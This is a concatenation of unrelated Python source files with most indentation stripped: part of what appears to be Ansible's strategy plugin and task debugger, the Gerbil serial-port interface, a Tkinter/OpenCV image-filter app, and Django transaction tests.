self._notified_handlers[listening_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', listening_handler, original_host)
# and if none were found, then we raise an error
if not found:
msg = ("The requested handler '%s' was not found in either the main handlers list nor in the listening "
"handlers list" % handler_name)
if C.ERROR_ON_MISSING_HANDLER:
raise AnsibleError(msg)
else:
display.warning(msg)
if 'add_host' in result_item:
# this task added a new host (add_host module)
new_host_info = result_item.get('add_host', dict())
self._add_host(new_host_info, iterator)
elif 'add_group' in result_item:
# this task added a new group (group_by module)
self._add_group(original_host, result_item)
if 'ansible_facts' in result_item:
# if delegated fact and we are delegating facts, we need to change target host for them
if original_task.delegate_to is not None and original_task.delegate_facts:
host_list = self.get_delegated_hosts(result_item, original_task)
else:
host_list = self.get_task_hosts(iterator, original_host, original_task)
if original_task.action == 'include_vars':
for (var_name, var_value) in iteritems(result_item['ansible_facts']):
# find the host we're actually referring too here, which may
# be a host that is not really in inventory at all
for target_host in host_list:
self._variable_manager.set_host_variable(target_host, var_name, var_value)
else:
cacheable = result_item.pop('_ansible_facts_cacheable', False)
for target_host in host_list:
if not original_task.action == 'set_fact' or cacheable:
self._variable_manager.set_host_facts(target_host, result_item['ansible_facts'].copy())
if original_task.action == 'set_fact':
self._variable_manager.set_nonpersistent_facts(target_host, result_item['ansible_facts'].copy())
if 'ansible_stats' in result_item and 'data' in result_item['ansible_stats'] and result_item['ansible_stats']['data']:
if 'per_host' not in result_item['ansible_stats'] or result_item['ansible_stats']['per_host']:
host_list = self.get_task_hosts(iterator, original_host, original_task)
else:
host_list = [None]
data = result_item['ansible_stats']['data']
aggregate = 'aggregate' in result_item['ansible_stats'] and result_item['ansible_stats']['aggregate']
for myhost in host_list:
for k in data.keys():
if aggregate:
self._tqm._stats.update_custom_stats(k, data[k], myhost)
else:
self._tqm._stats.set_custom_stats(k, data[k], myhost)
if 'diff' in task_result._result:
if self._diff or getattr(original_task, 'diff', False):
self._tqm.send_callback('v2_on_file_diff', task_result)
if not isinstance(original_task, TaskInclude):
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
# finally, send the ok for this task
self._tqm.send_callback('v2_runner_on_ok', task_result)
self._pending_results -= 1
if original_host.name in self._blocked_hosts:
del self._blocked_hosts[original_host.name]
# If this is a role task, mark the parent role as being run (if
# the task was ok or failed, but not skipped or unreachable)
if original_task._role is not None and role_ran: # TODO: and original_task.action != 'include_role':?
# lookup the role in the ROLE_CACHE to make sure we're dealing
# with the correct object and mark it as executed
for (entry, role_obj) in iteritems(iterator._play.ROLE_CACHE[original_task._role._role_name]):
if role_obj._uuid == original_task._role._uuid:
role_obj._had_task_run[original_host.name] = True
ret_results.append(task_result)
if one_pass or max_passes is not None and (cur_pass + 1) >= max_passes:
break
cur_pass += 1
return ret_results
def _wait_on_pending_results(self, iterator):
'''
Wait for the shared counter to drop to zero, using a short sleep
between checks to ensure we don't spin lock
'''
ret_results = []
display.debug("waiting for pending results...")
while self._pending_results > 0 and not self._tqm._terminated:
if self._tqm.has_dead_workers():
raise AnsibleError("A worker was found in a dead state")
results = self._process_pending_results(iterator)
ret_results.extend(results)
if self._pending_results > 0:
time.sleep(C.DEFAULT_INTERNAL_POLL_INTERVAL)
display.debug("no more pending results, returning what we have")
return ret_results
def _add_host(self, host_info, iterator):
'''
Helper function to add a new host to inventory based on a task result.
'''
if host_info:
host_name = host_info.get('host_name')
# Check if host in inventory, add if not
if host_name not in self._inventory.hosts:
self._inventory.add_host(host_name, 'all')
new_host = self._inventory.hosts.get(host_name)
# Set/update the vars for this host
new_host.vars = combine_vars(new_host.get_vars(), host_info.get('host_vars', dict()))
new_groups = host_info.get('groups', [])
for group_name in new_groups:
if group_name not in self._inventory.groups:
self._inventory.add_group(group_name)
new_group = self._inventory.groups[group_name]
new_group.add_host(self._inventory.hosts[host_name])
# reconcile inventory, ensures inventory rules are followed
self._inventory.reconcile_inventory()
def _add_group(self, host, result_item):
'''
Helper function to add a group (if it does not exist), and to assign the
specified host to that group.
'''
changed = False
# the host here is from the executor side, which means it was a
# serialized/cloned copy and we'll need to look up the proper
# host object from the master inventory
real_host = self._inventory.hosts.get(host.name)
if real_host is None:
if host.name == self._inventory.localhost.name:
real_host = self._inventory.localhost
else:
raise AnsibleError('%s cannot be matched in inventory' % host.name)
group_name = result_item.get('add_group')
parent_group_names = result_item.get('parent_groups', [])
for name in [group_name] + parent_group_names:
if name not in self._inventory.groups:
# create the new group and add it to inventory
self._inventory.add_group(name)
changed = True
group = self._inventory.groups[group_name]
for parent_group_name in parent_group_names:
parent_group = self._inventory.groups[parent_group_name]
parent_group.add_child_group(group)
if real_host.name not in group.get_hosts():
group.add_host(real_host)
changed = True
if group_name not in host.get_groups():
real_host.add_group(group)
changed = True
if changed:
self._inventory.reconcile_inventory()
return changed
def _copy_included_file(self, included_file):
'''
A proven safe and performant way to create a copy of an included file
'''
ti_copy = included_file._task.copy(exclude_parent=True)
ti_copy._parent = included_file._task._parent
temp_vars = ti_copy.vars.copy()
temp_vars.update(included_file._args)
ti_copy.vars = temp_vars
return ti_copy
def _load_included_file(self, included_file, iterator, is_handler=False):
'''
Loads an included YAML file of tasks, applying the optional set of variables.
'''
display.debug("loading included file: %s" % included_file._filename)
try:
data = self._loader.load_from_file(included_file._filename)
if data is None:
return []
elif not isinstance(data, list):
raise AnsibleError("included task files must contain a list of tasks")
ti_copy = self._copy_included_file(included_file)
# pop tags out of the include args, if they were specified there, and assign
# them to the include. If the include already had tags specified, we raise an
# error so that users know not to specify them both ways
tags = included_file._task.vars.pop('tags', [])
if isinstance(tags, string_types):
tags = tags.split(',')
if len(tags) > 0:
if len(included_file._task.tags) > 0:
raise AnsibleParserError("Include tasks should not specify tags in more than one way (both via args and directly on the task). "
"Mixing tag specify styles is prohibited for whole import hierarchy, not only for single import statement",
obj=included_file._task._ds)
display.deprecated("You should not specify tags in the include parameters. All tags should be specified using the task-level option")
included_file._task.tags = tags
block_list = load_list_of_blocks(
data,
play=iterator._play,
parent_block=None,
task_include=ti_copy,
role=included_file._task._role,
use_handlers=is_handler,
loader=self._loader,
variable_manager=self._variable_manager,
)
# since we skip incrementing the stats when the task result is
# first processed, we do so now for each host in the list
for host in included_file._hosts:
self._tqm._stats.increment('ok', host.name)
except AnsibleError as e:
# mark all of the hosts including this file as failed, send callbacks,
# and increment the stats for this host
for host in included_file._hosts:
tr = TaskResult(host=host, task=included_file._task, return_data=dict(failed=True, reason=to_text(e)))
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
self._tqm._stats.increment('failures', host.name)
self._tqm.send_callback('v2_runner_on_failed', tr)
return []
# finally, send the callback and return the list of blocks loaded
self._tqm.send_callback('v2_playbook_on_include', included_file)
display.debug("done processing included file")
return block_list
def run_handlers(self, iterator, play_context):
'''
Runs handlers on those hosts which have been notified.
'''
result = self._tqm.RUN_OK
for handler_block in iterator._play.handlers:
# FIXME: handlers need to support the rescue/always portions of blocks too,
# but this may take some work in the iterator and gets tricky when
# we consider the ability of meta tasks to flush handlers
for handler in handler_block.block:
if handler._uuid in self._notified_handlers and len(self._notified_handlers[handler._uuid]):
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler)
templar = Templar(loader=self._loader, variables=handler_vars)
handler_name = handler.get_name()
try:
handler_name = templar.template(handler_name)
except (UndefinedError, AnsibleUndefinedVariable):
pass
result = self._do_handler_run(handler, handler_name, iterator=iterator, play_context=play_context)
if not result:
break
return result
def _do_handler_run(self, handler, handler_name, iterator, play_context, notified_hosts=None):
# FIXME: need to use iterator.get_failed_hosts() instead?
# if not len(self.get_hosts_remaining(iterator._play)):
# self._tqm.send_callback('v2_playbook_on_no_hosts_remaining')
# result = False
# break
saved_name = handler.name
handler.name = handler_name
self._tqm.send_callback('v2_playbook_on_handler_task_start', handler)
handler.name = saved_name
if notified_hosts is None:
notified_hosts = self._notified_handlers[handler._uuid]
run_once = False
try:
action = action_loader.get(handler.action, class_only=True)
if handler.run_once or getattr(action, 'BYPASS_HOST_LOOP', False):
run_once = True
except KeyError:
# we don't care here, because the action may simply not have a
# corresponding action plugin
pass
host_results = []
for host in notified_hosts:
if not handler.has_triggered(host) and (not iterator.is_failed(host) or play_context.force_handlers):
task_vars = self._variable_manager.get_vars(play=iterator._play, host=host, task=handler)
self.add_tqm_variables(task_vars, play=iterator._play)
self._queue_task(host, handler, task_vars, play_context)
if run_once:
break
# collect the results from the handler run
host_results = self._wait_on_pending_results(iterator)
try:
included_files = IncludedFile.process_include_results(
host_results,
iterator=iterator,
loader=self._loader,
variable_manager=self._variable_manager
)
except AnsibleError as e:
return False
result = True
if len(included_files) > 0:
for included_file in included_files:
try:
new_blocks = self._load_included_file(included_file, iterator=iterator, is_handler=True)
# for every task in each block brought in by the include, add the list
# of hosts which included the file to the notified_handlers dict
for block in new_blocks:
iterator._play.handlers.append(block)
iterator.cache_block_tasks(block)
for task in block.block:
result = self._do_handler_run(
handler=task,
handler_name=task.get_name(),
iterator=iterator,
play_context=play_context,
notified_hosts=included_file._hosts[:],
)
if not result:
break
except AnsibleError as e:
for host in included_file._hosts:
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
display.warning(str(e))
continue
# wipe the notification list
self._notified_handlers[handler._uuid] = []
display.debug("done running handlers, result is: %s" % result)
return result
def _take_step(self, task, host=None):
ret = False
msg = u'Perform task: %s ' % task
if host:
msg += u'on %s ' % host
msg += u'(N)o/(y)es/(c)ontinue: '
resp = display.prompt(msg)
if resp.lower() in ['y', 'yes']:
display.debug("User ran task")
ret = True
elif resp.lower() in ['c', 'continue']:
display.debug("User ran task and canceled step mode")
self._step = False
ret = True
else:
display.debug("User skipped task")
display.banner(msg)
return ret
def _cond_not_supported_warn(self, task_name):
display.warning("%s task does not support when conditional" % task_name)
def _execute_meta(self, task, play_context, iterator, target_host):
# meta tasks store their args in the _raw_params field of args,
# since they do not use k=v pairs, so get that
meta_action = task.args.get('_raw_params')
def _evaluate_conditional(h):
all_vars = self._variable_manager.get_vars(play=iterator._play, host=h, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
return task.evaluate_conditional(templar, all_vars)
skipped = False
msg = ''
if meta_action == 'noop':
# FIXME: issue a callback for the noop here?
if task.when:
self._cond_not_supported_warn(meta_action)
msg = "noop"
elif meta_action == 'flush_handlers':
if task.when:
self._cond_not_supported_warn(meta_action)
self.run_handlers(iterator, play_context)
msg = "ran handlers"
elif meta_action == 'refresh_inventory' or self.flush_cache:
if task.when:
self._cond_not_supported_warn(meta_action)
self._inventory.refresh_inventory()
msg = "inventory successfully refreshed"
elif meta_action == 'clear_facts':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
hostname = host.get_name()
self._variable_manager.clear_facts(hostname)
msg = "facts cleared"
else:
skipped = True
elif meta_action == 'clear_host_errors':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
self._tqm._failed_hosts.pop(host.name, False)
self._tqm._unreachable_hosts.pop(host.name, False)
iterator._host_states[host.name].fail_state = iterator.FAILED_NONE
msg = "cleared host errors"
else:
skipped = True
elif meta_action == 'end_play':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
if host.name not in self._tqm._unreachable_hosts:
iterator._host_states[host.name].run_state = iterator.ITERATING_COMPLETE
msg = "ending play"
elif meta_action == 'reset_connection':
all_vars = self._variable_manager.get_vars(play=iterator._play, host=target_host, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
# apply the given task's information to the connection info,
# which may override some fields already set by the play or
# the options specified on the command line
play_context = play_context.set_task_and_variable_override(task=task, variables=all_vars, templar=templar)
# fields set from the play/task may be based on variables, so we have to
# do the same kind of post validation step on it here before we use it.
play_context.post_validate(templar=templar)
# now that the play context is finalized, if the remote_addr is not set
# default to using the host's address field as the remote address
if not play_context.remote_addr:
play_context.remote_addr = target_host.address
# We also add "magic" variables back into the variables dict to make sure
# a certain subset of variables exist.
play_context.update_vars(all_vars)
if task.when:
self._cond_not_supported_warn(meta_action)
if target_host in self._active_connections:
connection = Connection(self._active_connections[target_host])
del self._active_connections[target_host]
else:
connection = connection_loader.get(play_context.connection, play_context, os.devnull)
play_context.set_options_from_plugin(connection)
if connection:
try:
connection.reset()
msg = 'reset connection'
except ConnectionError as e:
# most likely socket is already closed
display.debug("got an error while closing persistent connection: %s" % e)
else:
msg = 'no connection, nothing to reset'
else:
raise AnsibleError("invalid meta action requested: %s" % meta_action, obj=task._ds)
result = {'msg': msg}
if skipped:
result['skipped'] = True
else:
result['changed'] = False
display.vv("META: %s" % msg)
return [TaskResult(target_host, task, result)]
def get_hosts_left(self, iterator):
''' returns list of available hosts for this iterator by filtering out unreachables '''
hosts_left = []
for host in self._inventory.get_hosts(iterator._play.hosts, order=iterator._play.order):
if host.name not in self._tqm._unreachable_hosts:
hosts_left.append(host)
return hosts_left
def update_active_connections(self, results):
''' updates the current active persistent connections '''
for r in results:
if 'args' in r._task_fields:
socket_path = r._task_fields['args'].get('_ansible_socket')
if socket_path:
if r._host not in self._active_connections:
self._active_connections[r._host] = socket_path
class NextAction(object):
""" The next action after an interpreter's exit. """
REDO = 1
CONTINUE = 2
EXIT = 3
def __init__(self, result=EXIT):
self.result = result
class Debugger(cmd.Cmd):
prompt_continuous = '> ' # multiple lines
def __init__(self, task, host, task_vars, play_context, result, next_action):
# cmd.Cmd is old-style class
cmd.Cmd.__init__(self)
self.prompt = '[%s] %s (debug)> ' % (host, task)
self.intro = None
self.scope = {}
self.scope['task'] = task
self.scope['task_vars'] = task_vars
self.scope['host'] = host
self.scope['play_context'] = play_context
self.scope['result'] = result
self.next_action = next_action
def cmdloop(self):
try:
cmd.Cmd.cmdloop(self)
except KeyboardInterrupt:
pass
do_h = cmd.Cmd.do_help
def do_EOF(self, args):
"""Quit"""
return self.do_quit(args)
def do_quit(self, args):
"""Quit"""
display.display('User interrupted execution')
self.next_action.result = NextAction.EXIT
return True
do_q = do_quit
def do_continue(self, args):
"""Continue to next result"""
self.next_action.result = NextAction.CONTINUE
return True
do_c = do_continue
def do_redo(self, args):
"""Schedule task for re-execution. The re-execution may not be the next result"""
self.next_action.result = NextAction.REDO
return True
do_r = do_redo
def evaluate(self, args):
try:
return eval(args, globals(), self.scope)
except Exception:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else:
exc_type_name = t.__name__
display.display('***%s:%s' % (exc_type_name, repr(v)))
raise
def do_pprint(self, args):
"""Pretty Print"""
try:
result = self.evaluate(args)
display.display(pprint.pformat(result))
except Exception:
pass
do_p = do_pprint
def execute(self, args):
try:
code = compile(args + '\n', '<stdin>', 'single')
exec(code, globals(), self.scope)
except Exception:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else:
exc_type_name = t.__name__
display.display('***%s:%s' % (exc_type_name, repr(v)))
raise
def default(self, line):
try:
self.execute(line)
except Exception:
pass
|
interface.py
|
"""
Gerbil - Copyright (c) 2015 Michael Franzl
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
import serial
import time
import threading
import logging
class Interface:
"""Implements opening, closing, writing and threaded reading from the serial port. Read data are put into a Thread Queue.
"""
def __init__(self, name, path, baud=115200):
"""Straightforward initialization tasks.
@param name
An informal name of the instance. Useful if you are running
several instances to control several serial ports at once.
It is only used for logging output and UI messages.
@param path
The serial port device node living under /dev.
e.g. /dev/ttyACM0 or /dev/ttyUSB0
@param baud
The baud rate. Default is 115200 for Grbl > v0.9i.
"""
self.name = name
self.path = path
self.baud = baud
self.queue = None
self.logger = logging.getLogger("gerbil.interface")
self._buf_receive = ""
self._do_receive = False
def start(self, queue):
"""
Open the device node and start a Thread for reading.
@param queue
An instance of Python3's `Queue()` class.
"""
self.queue = queue
self.logger.info("%s: connecting to %s with baudrate %i", self.name, self.path, self.baud)
self.serialport = serial.Serial(self.path, self.baud, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=1, writeTimeout=0)
self.serialport.flushInput()
self.serialport.flushOutput()
self._do_receive = True
self.serial_thread = threading.Thread(target=self._receiving)
self.serial_thread.start()
def stop(self):
"""
Close the device node and shut down the reading Thread.
"""
self._do_receive = False
self.logger.info("%s: stop()", self.name)
self.serial_thread.join()
self.logger.info("%s: JOINED thread", self.name)
self.logger.info("%s: Closing port", self.name)
self.serialport.flushInput()
self.serialport.flushOutput()
self.serialport.close()
def write(self, data):
"""
        Write `data` to the device node and return the number of bytes written.
        If `data` is empty, nothing is written and None is returned.
"""
if len(data) > 0:
num_written = self.serialport.write(bytes(data,"ascii"))
return num_written
else:
self.logger.debug("%s: nothing to write", self.name)
def _receiving(self):
        while self._do_receive:
            # Block for at most the port timeout on the first byte, then drain
            # whatever is already buffered so complete lines arrive quickly.
            data = self.serialport.read(1)
            waiting = self.serialport.inWaiting()
            data += self.serialport.read(waiting)
self._handle_data(data)
def _handle_data(self, data):
try:
asci = data.decode("ascii")
except UnicodeDecodeError:
self.logger.info("%s: Received a non-ascii byte. Probably junk. Dropping it.", self.name)
asci = ""
for i in range(0, len(asci)):
char = asci[i]
self._buf_receive += char
# not all received lines are complete (end with \n)
if char == "\n":
self.queue.put(self._buf_receive.strip())
self._buf_receive = ""
|
app.py
|
from tkinter import *
from PIL import Image
import tkinter.messagebox
from PIL import ImageTk
from PIL import *
from tkinter import filedialog
import threading
from tkinter.ttk import Combobox
from PIL import ImageFilter
import cv2
import numpy as np
class Img_filter:
def __init__(self,root):
self.root=root
self.root.title("Image filter")
self.root.geometry("500x400")
self.root.iconbitmap("logo328.ico")
self.root.resizable(0,0)
save=StringVar()
color=StringVar()
fil=StringVar()
def browse():
global filename
global photo_image
file_path = filedialog.askopenfilename(title = "Select file",filetypes = (("Jpeg files","*.jpg"),("png files","*.png"),("all files","*.*")))
filename =file_path
self.original = Image.open(file_path)
resized = self.original.resize((355,160),Image.ANTIALIAS)
self.image = ImageTk.PhotoImage(resized)
photo_image=Label(firstframe,image=self.image,bd=2)
photo_image.place(x=65,y=65)
def convert():
try:
if len(filename)!=0:
if save.get()!="":
if fil.get()!="Select Filter":
if fil.get()=="Edges":
img=cv2.imread(filename)
gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
gray=cv2.medianBlur(gray,5)
edges=cv2.adaptiveThreshold(gray,250,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,9,9)
cv2.imwrite("{}.png".format(save.get()),edges)
cv2.waitKey(0)
cv2.destroyAllWindows()
if fil.get()=="Cartoon":
img=cv2.imread(filename)
color=cv2.bilateralFilter(img,9,250,250)
gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
gray=cv2.medianBlur(gray,5)
edges=cv2.adaptiveThreshold(gray,250,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,9,9)
cartoon=cv2.bitwise_and(color,color,mask=edges)
cv2.imwrite("{}.png".format(save.get()),cartoon)
cv2.waitKey(0)
cv2.destroyAllWindows()
else:
tkinter.messagebox.showerror("Error","Please Select the filter")
else:
tkinter.messagebox.showerror("Error","Please Enter Save Name")
else:
tkinter.messagebox.showerror("Error","Please Select Image")
except Exception as e:
tkinter.messagebox.showerror("Error",e)
def thread_convert():
t=threading.Thread(target=convert)
t.start()
def on_enter1(e):
but_convert_ascii['background']="black"
but_convert_ascii['foreground']="cyan"
def on_leave1(e):
but_convert_ascii['background']="SystemButtonFace"
but_convert_ascii['foreground']="SystemButtonText"
def on_enter2(e):
but_clear['background']="black"
but_clear['foreground']="cyan"
def on_leave2(e):
but_clear['background']="SystemButtonFace"
but_clear['foreground']="SystemButtonText"
def on_enter3(e):
but_Browse['background']="black"
but_Browse['foreground']="cyan"
def on_leave3(e):
but_Browse['background']="SystemButtonFace"
but_Browse['foreground']="SystemButtonText"
def clear():
save.set("")
photo_image.config(image="")
lab_success.config(text="")
fil.set("Select Filter")
color.set("Select Color")
#==========================frame=================================================#
mainframe=Frame(self.root,width=500,height=400,relief="ridge",bd=3)
mainframe.place(x=0,y=0)
firstframe=Frame(mainframe,width=493,height=350,relief="ridge",bd=3,bg="black")
firstframe.place(x=0,y=0)
secondframe=Frame(mainframe,width=493,height=45,relief="ridge",bd=3)
secondframe.place(x=0,y=350)
#===========================firstframe==================================================#
but_Browse=Button(firstframe,text="Browse",width=15,font=('times new roman',12),cursor="hand2",command=browse)
but_Browse.place(x=170,y=10)
but_Browse.bind("<Enter>",on_enter3)
but_Browse.bind("<Leave>",on_leave3)
global photo_image
self.original = Image.open("C:/Users/SHREYAS/Desktop/shreyas python/img_ascii/black.png")
resized = self.original.resize((355,160),Image.ANTIALIAS)
self.image = ImageTk.PhotoImage(resized)
#bglab=Label(F1,image=self.image,bd=2).place(x=0,y=0)
photo_image=Label(firstframe,image=self.image,bd=2)
photo_image.place(x=65,y=65)
lab_save=Label(firstframe,text="Save As Name",font=('times new roman',12),bg="black",fg="white")
lab_save.place(x=30,y=250)
ent_save=Entry(firstframe,width=30,font=('times new roman',12),relief="ridge",bd=3,textvariable=save)
ent_save.place(x=170,y=250)
lab_success=Label(firstframe,text="",font=('times new roman',12),bg="black",fg="white")
lab_success.place(x=120,y=300)
lab_please_filter=Label(firstframe,text="Please Select Filter",font=('times new roman',12),bg="black",fg="white")
lab_please_filter.place(x=30,y=300)
filters=['Edges',"Cartoon"]
filters_combo=Combobox(firstframe,values=filters,font=('arial',14),width=14,state="readonly",textvariable=fil)
filters_combo.set("Select Filter")
filters_combo.place(x=200,y=300)
#=========================secondframe==================================================#
but_convert_ascii=Button(secondframe,width=18,text="Convert Image",font=('times new roman',12),cursor="hand2",command=thread_convert)
but_convert_ascii.place(x=40,y=5)
but_convert_ascii.bind("<Enter>",on_enter1)
but_convert_ascii.bind("<Leave>",on_leave1)
but_clear=Button(secondframe,width=18,text="Clear",font=('times new roman',12),cursor="hand2",command=clear)
but_clear.place(x=270,y=5)
but_clear.bind("<Enter>",on_enter2)
but_clear.bind("<Leave>",on_leave2)
if __name__ == "__main__":
root=Tk()
Img_filter(root)
root.mainloop()
|
tests.py
|
from __future__ import unicode_literals
import sys
import threading
import time
from unittest import skipIf, skipUnless
from django.db import (connection, transaction,
DatabaseError, Error, IntegrityError, OperationalError)
from django.test import TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature
from django.utils import six
from .models import Reporter
@skipUnless(connection.features.uses_savepoints,
"'atomic' requires transactions and savepoints.")
class AtomicTests(TransactionTestCase):
"""
Tests for the atomic decorator and context manager.
The tests make assertions on internal attributes because there isn't a
robust way to ask the database for its current transaction state.
Since the decorator syntax is converted into a context manager (see the
implementation), there are only a few basic tests with the decorator
syntax and the bulk of the tests use the context manager syntax.
"""
available_apps = ['transactions']
def test_decorator_syntax_commit(self):
@transaction.atomic
def make_reporter():
Reporter.objects.create(first_name="Tintin")
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_decorator_syntax_rollback(self):
@transaction.atomic
def make_reporter():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
with six.assertRaisesRegex(self, Exception, "Oops"):
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_alternate_decorator_syntax_commit(self):
@transaction.atomic()
def make_reporter():
Reporter.objects.create(first_name="Tintin")
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_alternate_decorator_syntax_rollback(self):
@transaction.atomic()
def make_reporter():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
with six.assertRaisesRegex(self, Exception, "Oops"):
make_reporter()
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_nested_commit_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic():
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: Archibald Haddock>', '<Reporter: Tintin>'])
def test_nested_commit_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_nested_rollback_commit(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with transaction.atomic():
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_nested_rollback_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_commit_commit(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: Archibald Haddock>', '<Reporter: Tintin>'])
def test_merged_commit_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
# Writes in the outer block are rolled back too.
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_rollback_commit(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with transaction.atomic(savepoint=False):
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_merged_rollback_rollback(self):
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic():
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with transaction.atomic(savepoint=False):
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_reuse_commit_commit(self):
atomic = transaction.atomic()
with atomic:
Reporter.objects.create(first_name="Tintin")
with atomic:
Reporter.objects.create(first_name="Archibald", last_name="Haddock")
self.assertQuerysetEqual(Reporter.objects.all(),
['<Reporter: Archibald Haddock>', '<Reporter: Tintin>'])
def test_reuse_commit_rollback(self):
atomic = transaction.atomic()
with atomic:
Reporter.objects.create(first_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
def test_reuse_rollback_commit(self):
atomic = transaction.atomic()
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(last_name="Tintin")
with atomic:
Reporter.objects.create(last_name="Haddock")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_reuse_rollback_rollback(self):
atomic = transaction.atomic()
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(last_name="Tintin")
with six.assertRaisesRegex(self, Exception, "Oops"):
with atomic:
Reporter.objects.create(first_name="Haddock")
raise Exception("Oops, that's his last name")
raise Exception("Oops, that's his first name")
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_force_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
            # The atomic block shouldn't roll back, but force it.
self.assertFalse(transaction.get_rollback())
transaction.set_rollback(True)
self.assertQuerysetEqual(Reporter.objects.all(), [])
def test_prevent_rollback(self):
with transaction.atomic():
Reporter.objects.create(first_name="Tintin")
sid = transaction.savepoint()
# trigger a database error inside an inner atomic without savepoint
with self.assertRaises(DatabaseError):
with transaction.atomic(savepoint=False):
with connection.cursor() as cursor:
cursor.execute(
"SELECT no_such_col FROM transactions_reporter")
# prevent atomic from rolling back since we're recovering manually
self.assertTrue(transaction.get_rollback())
transaction.set_rollback(False)
transaction.savepoint_rollback(sid)
self.assertQuerysetEqual(Reporter.objects.all(), ['<Reporter: Tintin>'])
